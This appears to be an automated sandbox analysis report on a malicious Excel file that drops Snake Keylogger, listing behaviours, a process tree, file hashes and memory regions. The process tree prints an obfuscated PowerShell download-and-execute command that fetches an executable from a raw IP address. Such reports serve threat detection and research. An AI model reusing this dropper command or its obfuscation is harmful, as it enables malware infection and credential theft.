Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    01-10-2024 12:18

General

  • Target

    CANADAXORDER.xls

  • Size

    866KB

  • MD5

    b74b9f77a4f538ff131c1be7ed01414f

  • SHA1

    25dac77c5cf517d87da4e2b936a294b88c73185d

  • SHA256

    c041864b59bbcc3ffb518337b77a636aa23967f552ec712ffebc25df56f399f1

  • SHA512

    19b80ce89cef0288e95081dab9da47df5afc20a958159cd9ac9f96177fb0e249ee713524f703109b3effaf1f48a28251187fd6b0c2eb59d4be870d0eb53932c7

  • SSDEEP

    24576:2VgVPjrLE7wRtMk8gwYRJBeMgBDDb/7zpkH/6:2yjXE7wRKzERJTgBXbm

Malware Config

Extracted

Family

snakekeylogger

Credentials

Signatures

  • Snake Keylogger

    Keylogger and Infostealer first seen in November 2020.

  • Snake Keylogger payload 3 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file
  • Evasion via Device Credential Deployment 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\CANADAXORDER.xls
    1⤵
    • System Location Discovery: System Language Discovery
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:1252
  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe -Embedding
    1⤵
    • Blocklisted process makes network request
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2740
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" "/C POWERsheLl -eX bYPASs -NOp -w 1 -c DEViceCReDenTIalDEPlOYmEnT.EXE ; iEX($(iEx('[SYsteM.TExt.EncOdINg]'+[CHar]0x3A+[CHAr]0x3A+'utF8.GEtstrInG([sySteM.cOnVERT]'+[cHAr]0X3A+[char]58+'FROMBaSE64STRinG('+[char]34+'JHlXZHp3VklSYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1CRXJERWZJTkl0SU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFqVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBSZVFJLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1WLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrSndka0tHYWJ4LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhjZmRoKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVHhuIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0Y3QgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHlXZHp3VklSYTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzUwL3Rhc2tob3N0dy5leGUiLCIkZW5WOkFQUERBVEFcdGFza2hvc3R3LmV4ZSIsMCwwKTtTdEFSdC1TTGVFUCgzKTtzVEFyVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcdGFza2hvc3R3LmV4ZSI='+[Char]34+'))')))"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2680
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        POWERsheLl -eX bYPASs -NOp -w 1 -c DEViceCReDenTIalDEPlOYmEnT.EXE ; iEX($(iEx('[SYsteM.TExt.EncOdINg]'+[CHar]0x3A+[CHAr]0x3A+'utF8.GEtstrInG([sySteM.cOnVERT]'+[cHAr]0X3A+[char]58+'FROMBaSE64STRinG('+[char]34+'JHlXZHp3VklSYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1CRXJERWZJTkl0SU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFqVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBSZVFJLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1WLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrSndka0tHYWJ4LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhjZmRoKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVHhuIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0Y3QgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHlXZHp3VklSYTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzUwL3Rhc2tob3N0dy5leGUiLCIkZW5WOkFQUERBVEFcdGFza2hvc3R3LmV4ZSIsMCwwKTtTdEFSdC1TTGVFUCgzKTtzVEFyVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcdGFza2hvc3R3LmV4ZSI='+[Char]34+'))')))"
        3⤵
        • Blocklisted process makes network request
        • Evasion via Device Credential Deployment
        • Loads dropped DLL
        • Drops file in System32 directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2260
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\57jrv9t-.cmdline"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2792
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
            C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB961.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCB960.tmp"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2948
        • C:\Users\Admin\AppData\Roaming\taskhostw.exe
          "C:\Users\Admin\AppData\Roaming\taskhostw.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of WriteProcessMemory
          PID:1388
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            "C:\Users\Admin\AppData\Roaming\taskhostw.exe"
            5⤵
            • Accesses Microsoft Outlook profiles
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • outlook_office_path
            • outlook_win_path
            PID:2076

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

    Filesize

    1KB

    MD5

    7fb5fa1534dcf77f2125b2403b30a0ee

    SHA1

    365d96812a69ac0a4611ea4b70a3f306576cc3ea

    SHA256

    33a39e9ec2133230533a686ec43760026e014a3828c703707acbc150fe40fd6f

    SHA512

    a9279fd60505a1bfeef6fb07834cad0fd5be02fd405573fc1a5f59b991e9f88f5e81c32fe910f69bdc6585e71f02559895149eaf49c25b8ff955459fd60c0d2e

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

    Filesize

    436B

    MD5

    971c514f84bba0785f80aa1c23edfd79

    SHA1

    732acea710a87530c6b08ecdf32a110d254a54c8

    SHA256

    f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895

    SHA512

    43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

    Filesize

    174B

    MD5

    c10259cbd76e6df014ffcbe8fa0482c7

    SHA1

    b40acabd172ff01328dd728709b553d7c09e8e6a

    SHA256

    f9be700d3b3c9ae324e76d152e59d9ce3b05c9036a2d4221566749d5f327fe9d

    SHA512

    466ec59be4aebf4dc7291adc432d7403c4822d585f0177651d1266f95e3e0ccc5ba6733e166e1054ee9f8bdc4e1d024b3a46334a722c28c561e9793ccd6cdfbb

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

    Filesize

    170B

    MD5

    18d053ffcfdba0f0d2bb2e174580072c

    SHA1

    7b80626504bea5d009cc7f492351f5691793b6c9

    SHA256

    492f0591ddd088d117e39270636b7149530fbff81be63454f6ad1aa7666a6ab1

    SHA512

    659ae4d64eb8e80de69e72c8f4a3667a3f860d5eba0aba5bf803d0c7ae09f07470bbca1b3539f4335ae5a244ca38cb4520f28a675c4100749fc7511694eb6d1f

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Y8UFEBH5\niceworkwitheverybody[1].hta

    Filesize

    8KB

    MD5

    46f7566c298cdc31ac0c0f7c7800d02e

    SHA1

    7ccaa47baaec50720f0f6cbccfff28947eee0d59

    SHA256

    4ac90b298cf34de897cee2147b6f3feb9236afdaa085f45c8d43dfdbf154a492

    SHA512

    53b97bd148afe1d3eda168418f0abcc75a7213b5339d1f481335d025a1cf7a84205b456e5bf7cf87bfd29bb12baf4c780274e4a7be3b8ba92eaa2e3ad4fea285

  • C:\Users\Admin\AppData\Local\Temp\57jrv9t-.dll

    Filesize

    3KB

    MD5

    4f64ae1b544d96b42a73527b3e1782af

    SHA1

    dfaf6314819b8a0047c3a07374cab1d47077658b

    SHA256

    147a7f339f554e14c32c75485b4b929b28486d45a626d5df1e09117987c6034d

    SHA512

    6a185f1ed1068e0e94f857e2837399ae6e687f3f215db7a29c35dbb430d60e5947529dc260d0c52fa5c8cc5e44460c0c6fccb9f0f3c2aca4ef4624f3e29a0b9c

  • C:\Users\Admin\AppData\Local\Temp\57jrv9t-.pdb

    Filesize

    7KB

    MD5

    86b6fb92b41dc7d90906e3c577428b1b

    SHA1

    28ca06788249fcf62081bb562bd300347f13ab8d

    SHA256

    1e55a7c5d27209cbfe5fb065256e98282a340b7e698444396f5df0a5a6d701b5

    SHA512

    d50e69f993af1a68fe29633d1e5d279d0f68d23415f578da6fd6a89bbb40f9dcb4080eee3574cfcde1253bb86ebe3152714c40105d1e1b6b2e7af0cf5983bce5

  • C:\Users\Admin\AppData\Local\Temp\CabAFEE.tmp

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Admin\AppData\Local\Temp\RESB961.tmp

    Filesize

    1KB

    MD5

    a092568cbf542b0ccbe92ef8d6d19238

    SHA1

    a120e56a39a6c45fc6fe6411fd951f76afbb05a9

    SHA256

    3bf708551c39338181510b3e9d23fc0f155b7062b9d380c692e2d345d01b9c8a

    SHA512

    23426b42047e31cda6b2fb9542f9475969a5454e74326ce8e83e5ff5466f27da2c8f67c27480300028a7fd37eba2b0bc2f79f9a156f3d36d6f0018f0dacea9f7

  • C:\Users\Admin\AppData\Roaming\taskhostw.exe

    Filesize

    927KB

    MD5

    72489275d4647bac97371516cc034a56

    SHA1

    154f42f5b5b2dee0407813f4b86ebc3b75313e89

    SHA256

    2ef8baaa2ea5cbf4bc00e9435c8191b1e57470a021819314692c9a13f26e5e82

    SHA512

    18dd73769d62999c7cd408377ca374b0df71a59703f810ead593ea37c49280c4b1f03b0192371aef4750dba60a25b26e2dcf44024ec13bf520e83740d904fc6c

  • \??\c:\Users\Admin\AppData\Local\Temp\57jrv9t-.0.cs

    Filesize

    463B

    MD5

    26586cfd3feae7a8042b855cf878e0b2

    SHA1

    fd8d93697c49047ddbcaaee8475061a4894a3906

    SHA256

    0374876ae0666d1d4296d2d500351e292b0ec565b31aac339abf1c551b2a26bd

    SHA512

    942f19de8f09985f9f39724b270bca2fe2c29b96ff1cf4db9fdb961321b3442b5266aaa437ed3f87c94e60e7c7f6f84b3bee4bd810284800cde7d53cbf6a84c6

  • \??\c:\Users\Admin\AppData\Local\Temp\57jrv9t-.cmdline

    Filesize

    309B

    MD5

    a1ecf0743193482b8612c454d9229025

    SHA1

    361c68eac9a80bdf3965c6e6e91ea19b100dc05f

    SHA256

    abd5d0b36570ed66c37df51c3e1d6481770c0a3a2d8b000ae037722202710462

    SHA512

    edd6b53704370ec87b7afc62ce046a5d8ee5c0b6c58be73879ef7c0dce744bbbc90ecf7c0e86f8cbb4aff06edc1e3100a1f9ddb0d633996bd8e81b124e94fd25

  • \??\c:\Users\Admin\AppData\Local\Temp\CSCB960.tmp

    Filesize

    652B

    MD5

    9d9750359b625368ef1dd5d51ad3a393

    SHA1

    853c42358c36d96681f05e518b2eff9262372b82

    SHA256

    2073014ad720c7b2b7a6aae5b656c1a3b71b9ed57b9cbdf0dc66cca60bddb101

    SHA512

    c7351713f07f7cebcd4e266fbe3243e1cdc97803c5d3b72a5ada91225448f0bfcdeb3d020567d78aad7cb3ef5647ed701737772a9c8a85ca88de3d6ed6c9f461

  • memory/1252-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/1252-1-0x0000000072ADD000-0x0000000072AE8000-memory.dmp

    Filesize

    44KB

  • memory/1252-17-0x00000000005E0000-0x00000000005E2000-memory.dmp

    Filesize

    8KB

  • memory/1252-55-0x0000000072ADD000-0x0000000072AE8000-memory.dmp

    Filesize

    44KB

  • memory/1252-68-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/1252-71-0x0000000072ADD000-0x0000000072AE8000-memory.dmp

    Filesize

    44KB

  • memory/2076-64-0x0000000000400000-0x0000000000426000-memory.dmp

    Filesize

    152KB

  • memory/2076-65-0x0000000000400000-0x0000000000426000-memory.dmp

    Filesize

    152KB

  • memory/2076-66-0x0000000000400000-0x0000000000426000-memory.dmp

    Filesize

    152KB

  • memory/2740-16-0x0000000000710000-0x0000000000712000-memory.dmp

    Filesize

    8KB